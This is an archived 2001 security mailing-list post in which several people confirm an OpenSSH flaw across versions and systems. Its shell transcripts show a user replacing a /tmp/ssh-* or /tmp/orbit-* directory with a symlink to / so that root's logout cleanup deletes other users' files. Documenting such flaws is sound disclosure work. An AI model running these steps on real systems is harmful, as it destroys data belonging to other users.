Re: SSH allows deletion of other users files...

From: aleph1at_private
Date: Tue Jun 05 2001 - 10:30:37 PDT

Next message: bugzillaat_private: "[RHSA-2001:075-04] Updated xinetd package available for Red Hat Linux 7 and 7.1"

Previous message: David Wagner: "Re: Mail delivery privileges"
In reply to: Jason DiCioccio: "Re: SSH allows deletion of other users files..."
Next in thread: David F. Skoll: "Re: SSH allows deletion of other users files..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Tomas Ericsson <teat_private>

The vulnerability works perfectly for me:                                                                                                                       sshd version OpenSSH_2.3.0 greenat_private 20010321

# uname -a
FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001
rootat_private:/usr/src/sys/compile/GENERIC  alpha

[root@myhost root]# echo "testing">/cookies
[root@myhost root]# ls -l /cookies
-rw-r--r--  1 root  wheel  8 Jun  5 01:48 /cookies
[root@myhost root]# ssh -l te myhost
[te@myhost te]# rm -rf /tmp/ssh-1i24iea5
[te@myhost te]# ln -s / /tmp/ssh-1i24iea5
[te@myhost te]# logout
[root@myhost root]# ls -l /cookies
ls: /cookies: No such file or directory


Shannon Lee <shannonat_private>

reproduced with OpenSSH_2.3.0p1 on redhat 6.2.


TE <teat_private>

This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest
updated packages from RedHat installed.

RH71# uname -a
Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
RH71# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-5

RH70# uname -a 
Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
RH70# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-1.7.2 


"David Thiel" <dthielat_private>

I tested this on 4.3-RELEASE, and was successful.
SSH Version OpenSSH_2.3.0 greenat_private 20010321


KF <dotslashat_private>

Works on my box

[root@bounce dotslash]# cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)
root@bounce dotslash]# ssh -V
SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0.
Compiled with SSL (0x0090581f).


Jan-Frode Myklebust <janfrodeat_private>

I just tested with OpenSSH_2.5.2p2 on RedHat 7.0,
and OpenSSH_2.9p1 on IRIX 6.5 and both are
vulnerable to this. I used protocol version 2 on
both machines.


Luciano Miguel Ferreira Rocha <strangeat_private>

Confirmied on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have
X forwarding activated.


"Golden_Eternity" <bhodiat_private>

I tried to reproduce this on a system running ssh 2.4.0, but I was unable to
locate the /tmp/ssh-* directory.

What version of ssh were you using when you discovered this?

[test@shiva test]$ ssh test@localhost
warning: Need basic cursor movement capablity, using vt100
test's password:
Authentication successful.
Last login: Mon Jun 04 2001 10:42:08 -0700
No mail.
[test@shiva test]$ ls -l /tmp/
total 12
drwxr-xr-x    2 root     root        12288 Apr  8 11:59 lost+found
[test@shiva test]$


"Schlosser, Matt D." <mschlosserat_private

On the contrary, it just takes another form:

[root@bob /root]# touch /cookies;ls /cookies
/cookies
[root@bob /root]# ssh zen@localhost
zen@localhost's password:
[zen@bob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen
[zen@bob zen]$ logout
Connection to localhost closed.
[root@bob /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

-- 
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum

Next message: bugzillaat_private: "[RHSA-2001:075-04] Updated xinetd package available for Red Hat Linux 7 and 7.1"
Previous message: David Wagner: "Re: Mail delivery privileges"
In reply to: Jason DiCioccio: "Re: SSH allows deletion of other users files..."
Next in thread: David F. Skoll: "Re: SSH allows deletion of other users files..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 14:42:58 PDT